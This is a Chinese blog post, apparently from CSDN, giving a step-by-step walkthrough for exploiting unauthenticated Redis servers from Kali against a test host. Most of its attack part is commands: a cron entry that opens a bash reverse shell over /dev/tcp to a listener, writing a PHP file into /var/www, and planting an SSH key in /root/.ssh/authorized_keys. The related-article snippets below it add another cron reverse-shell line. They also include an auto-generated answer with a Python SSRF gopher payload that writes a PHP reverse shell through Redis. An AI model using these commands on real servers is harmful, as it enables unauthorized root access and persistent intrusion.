redis 未授权访问配合计划任务反弹shell

已于 2023-06-03 15:13:48 修改
阅读量1.6k 收藏 6
点赞数 2
分类专栏: 数据库提权 文章标签: redis 数据库 缓存
于 2023-05-23 15:56:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_65096687/article/details/130828941
版权
文章详细介绍了Redis未授权访问漏洞的产生条件,包括未绑定特定IP和无密码认证,以及三种利用这种方式进行攻击的方法:反弹shell、直接写入webshell和修改SSH公钥实现免密登录。同时,提供了在KaliLinux上执行这些操作的命令示例。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

redis未授权访问漏洞产生条件:
1.redis绑定在 0.0.0.0:6379,且没有进行添加防火墙规则避免其他非信任来源ip访问等相关安全策略,直接暴露在公网;
2.没有设置密码认证(一般为空),可以免密码远程登录redis服务。

要在kali上下载客户端

对方redis数据库开启后就会直接连接

一共有三种利用方式:

1.利用redis反弹回来一个shell

root@kali:~# redis-cli -h 192.168.85.170
 set x "\n* * * * * bash -i >& /dev/tcp/反弹的ip/7999 0>&1\n"
 config set dir /var/spool/cron/
 config set dbfilename root
 save

然后直接本地开个nc

nc -lvnp 7999


进行接受反弹回来的信息

kali监听

2. 直接写shell

因为这是测试,所以知道对方的目录

config set dir /var/www
config set dbfilename test.php
set x "<?php phpinfo();?>"
save

然后在对方服务器查看一下

webshell已经被写入

3.改公钥免密登录

先本地生成一个密钥

ssh-keygen -t rsa

然后把密钥写入对方服务器

cat 1.txt | redis-cli -h 192.168.85.170 -x set crack

redis客户端登录

config set dir /root/.ssh             放入目录
config set dbfilename authorized_keys  改名
save
quit

 

然后退出,ssh免密登录    ssh -i id_rsa root@192.168.85.170  

 

 

Redis未授权访问漏洞记录(端口:6379、Linux、Windows)
墨痕诉清风的博客
11-12 7438
这就让黑客有了可乘之机,黑客可以远程连接到该数据库。但随着现代的服务部署方式的不断发展,组件化成了不可逃避的大趋势,docker就是这股风潮下的产物之一,而在这种部署模式下,一个单一的容器中不会有除 redis以外的任何服务存在,包括sh和 crontab,再加上权限的严格控制,只靠写文件就很难再 getshell了,在这种情况下,我们就需要其他的利用手段了。并且可以在 /root/.ssh/ 目录下看到我们上传的 authorized_keys 文件,正是由于这个文件的存在,我们才可以在本地用私钥登录。.
redis未授权
weixin_47224111的博客
10-16 2989
0X01redis介绍 redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set()、zset(sorted set –有序)和hash(哈希类型)。 redis很大程度补偿了memcached这类key/value存储的不足,在部分场合可以对关系数据库起到很好的补充作用。它提供了Java,C/C++,C#,PHP,JavaScript,Perl,Object-C,Python,Ruby,Erlang等客户
五、利用redis计划任务反弹shell
dahege666的博客
03-02 2514
一、测试环境 靶机 centos7 192.168.1.27 攻击机 kali 192.168.1.138 二、测试过程 1.先用kali监听接收shell的端口: 2.连接redis,创建一个key x,值为反弹shell语句,修改备份目录为linux计划任务目录,修改备份文件名为 root,以root身体执行计划任务 3.执行完后回到监听终端页面,但是反弹的...
Redis未授权访问反弹shell
Zlirving_的博客
06-17 2315
Redis简介 Redis 是一个高性能的key-value数据库。为了保证效率,数据都是缓存在内存中。redis会周期性的把更新的数据写入磁盘或者把修改操作写入追加的记录文件,并且在此基础上实现了master-slave(主从)同步   漏洞简介 1、什么是redis未授权访问漏洞 Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证,会导致任意
计划任务反弹Shell命令在不同Linux系统的区别
最新发布
smile_3779的博客
03-11 735
在文件中(目录下可以放置额外的Crontab文件)Debian和Ubuntu:/var/spool/cron/crontabs/
Redis未授权访问反弹shell记录
fengqingyuel的博客
10-09 468
环境配置情况: 攻击机:kali-2021.2 ,配置IP:10.1.25.44 redis靶机:CentOS 7.2 ,配置IP:10.3.70.70 1、在攻击机(10.1.25.44)先建立监听。 nc -nvlp 7788 2、在连接redis的客户端依次执行以下命令。 set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/10.1.25.44/7788 0>&1\n\n" //往当前用户的cronta
网络安全——redis未授权访问漏洞写入计划任务反弹shell
Demo不是emo的博客
09-17 6002
redis未授权访问漏洞,顾名思义,就是不需要输入账密就可以直接登录(含redis服务安装包分享),本文介绍了怎么利用该漏洞获取目标shell
redis未授权反弹shell
weixin_34235371的博客
05-15 226
rt发现一处redis未授权,进行反弹shell。输入反弹命令:主机监听端口:反弹成功。 转载于:https://blog.51cto.com/13539934/2395206
Redis未授权访问配合SSRF总结
saber的博客
10-24 1440
Redis是一个开源的内存数据库,它用于存储数据,并提供高性能、可扩展性和丰富的数据结构支持。默认情况下,会绑定在,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问等,这样将会将Redis服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未授权访问Redis的情况下,利用Redis自身的提供的config命令,可以进行写文件操作,并且写公匙登录。
ssrf结合redis未授权getshell
07-07 1510
原理即为攻击者通过SSRF访问内网或本地的redis6379端口,如果刚好存在redis未授权,即可getshell
Redis未授权访问利用总结
2ed
10-09 1747
漏洞概述 Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下可以利用 Redis 的相关方法,可以成功在 Redis 服务器上写入公钥,进而可以使用对应私钥直接登录目标服务器。 漏洞...
redis未授权访问反弹shell
18年3月萌新白帽子
06-26 4617
一、redis的安装1.使用wget命令获取redis的安装包wget http://download.redis.io/releases/redis-4.0.8.tar.gz2.tar –zxvf redis-4.0.8.tar.gz解压改文件然后进入redis-4.0.8这个文件夹   cd redis-4.0.8然后执行make命令由于我们刚刚安装好redis数据库,还未创建用户,默认使用的...
redis计划任务反弹shell
干铮的博客
01-31 3254
1.环境搭建 Ubuntu16.04安装redis sudo apt-get install redis-server vim /etc/redis/redis.conf 注释掉密码和仅允许本地访问 kali 安装redis-cli进行连接 wget http://download.redis.io/redis-stable.tar.gz tar -zxvf redis-stable.tar.gz cd redis-stable make //全局生效 cp src/redis
2021-8-1Redis计划任务反弹shell
qq_45290991的博客
08-01 2372
前段时间忙着毕业,终于现在毕业了,在愉快而紧张地等待毕业前期,我开始了Redis的学习。。。 一、搭建安装配置Redis数据库 我听说在centOS下可以Redis结合计划任务反弹shell成功,Ubuntu貌似不行 ...
[Shell]Redis未授权访问反弹shell
baguangman5501的博客
09-08 517
原作者:Cream 文章出处: 贝塔安全实验室 0x01 Redis未授权访问反弹shell Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivotal赞助。 Redis因配置不当可以未授权...
SSRF——手把手教你Redis反弹Shell
sudu2020dd的博客
06-04 4196
由于业务运行的服务器处于内外网边界,并且可通过利用当前的这台服务器,根据所在的网络,访问到与外部网络隔离的内网应用,所以一般情况下,SSRF漏洞的攻击目标是攻击者无法直接访问的内网系统。因为攻击Redis A之前,首先需要构造一个样本,如何构造,通过在kali本地搭建一个Redis B,作为本地测试,形成攻击链后将他的格式转换为gopher协议,然后测试完毕后,应用在真实攻击上,将gopher协议数据包发送给存在SSRF漏洞的机器实现攻击,转给Redis A,写一个计划任务反弹shell,往kali弹。
从0到1浅析Redis服务器反弹Shell那些事
道阻且长,行则将至
12-29 3198
本文学习了 Redis 服务的作用,并本地搭建了 Redis 服务,同时介绍了其相关基础使用方法和核心安全配置。然后总结分析了 Redis 未授权访问漏洞或弱口令导致 Redis 服务被攻击者操控后,如何进一步通过反弹 Shell 接管服务器。
redis 未授权访问shell
blackguest07的博客
03-18 1134
redis未授权访问shell
利用redis漏洞反弹shell
qq_54713392的博客
04-20 2287
利用redis漏洞反弹shell 攻击机:kali 192.168.32.132 目标机:centos7 192.168.32.144 (1)在目标机centos中安装redis服务器(redis-server) 解压,进入源码目录,然后编译(make、make install) 解压文件:tar -zxvf redis-2.8.17.tar.gz 移动解压文件 执行命令:mv redis-2.8.17 /usr/local/redis 进入到目录下:cd /usr/local/redis 执行ma
SSRFmap如何反弹shell
01-06
### 使用SSRFmap实现反弹Shell的方法 #### 工具准备 为了成功实施基于SSRF的攻击并最终获得目标系统的控制权,需要准备好必要的工具和环境配置。SSRFmap是一个专门用于探索和利用服务器端请求伪造(SSRF)漏洞的强大工具[^2]。 #### 利用流程 当确认目标存在可被利用的SSRF漏洞时,可以通过以下方式尝试获取更高权限: - **探测内部服务**:使用`ssrfprobe`模块来扫描内部网络的服务开放情况,这有助于发现潜在的目标如Redis、ElasticSearch等可能存在未授权访问风险的服务。 ```bash python ssrfmap.py -u "http://target.com/vuln?param=http://" --proxy http://127.0.0.1:8080 -m ssrfprobe ``` - **针对特定应用层协议的攻击向量构建** 对于已知易受攻击的应用程序接口(API),可以根据其特性定制相应的载荷(payloads)。例如,在处理HTTP响应重定向或解析URL的过程中可能出现的安全隐患。 - **绕过WAF/IDS检测机制** SSRFmap内置了一些技巧可以帮助避开常见的Web应用程序防火墙(WAF)以及入侵检测系统(IDS)规则集。这些技术包括但不限于修改User-Agent字符串、添加额外参数混淆实际意图等。 - **执行命令注入** 如果能够影响到某些支持外部资源加载的功能点,则有机会构造恶意输入触发远程代码执行(RCE)[^4]。特别是对于那些允许指定任意URI作为数据源的情况更为危险。 - **建立持久化连接** 成功渗透进入受害主机之后,下一步就是维持对该机器的长期掌控。此时可以考虑设置计划任务(cron job)或者其他形式的任务调度器定期回连至攻击者控制下的C&C服务器。 具体到通过Gopher协议配合Redis实现反弹shell的操作如下所示: 假设已经找到一个带有SSRF缺陷并且能与之交互的web页面参数,同时得知内网中有台Redis实例正处于无认证状态运行着,并且是以超级管理员(root)身份启动的话——那么就可以精心设计一条特殊的payload让该网站发起指向特殊格式url(`gopher://`)的GET请求,进而间接操控远端数据库完成一系列指令下达直至植入后门脚本为止。 ```python import requests # 构造Payload payload = 'gopher://localhost:6379/_SET%20cron.php%20"<?php%20exec(''bash%20-i%20>%26%20/dev/tcp/your_ip/your_port%200>%261'');?>"' # 发送含有恶意链接的数据包给有漏洞的地方 requests.get(f'http://example.com/ssrf_endpoint?url={payload}') ``` 上述Python代码片段展示了如何发送包含恶意负载的HTTP GET请求以利用SSRF漏洞并通过Gopher协议操纵Redis创建一个新的PHP文件[cron.php],其中嵌入了一条Linux Shell命令用来打开反向外壳连接回到攻击者的监听地址上。 请注意以上内容仅限安全研究学习目的,请勿非法使用!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值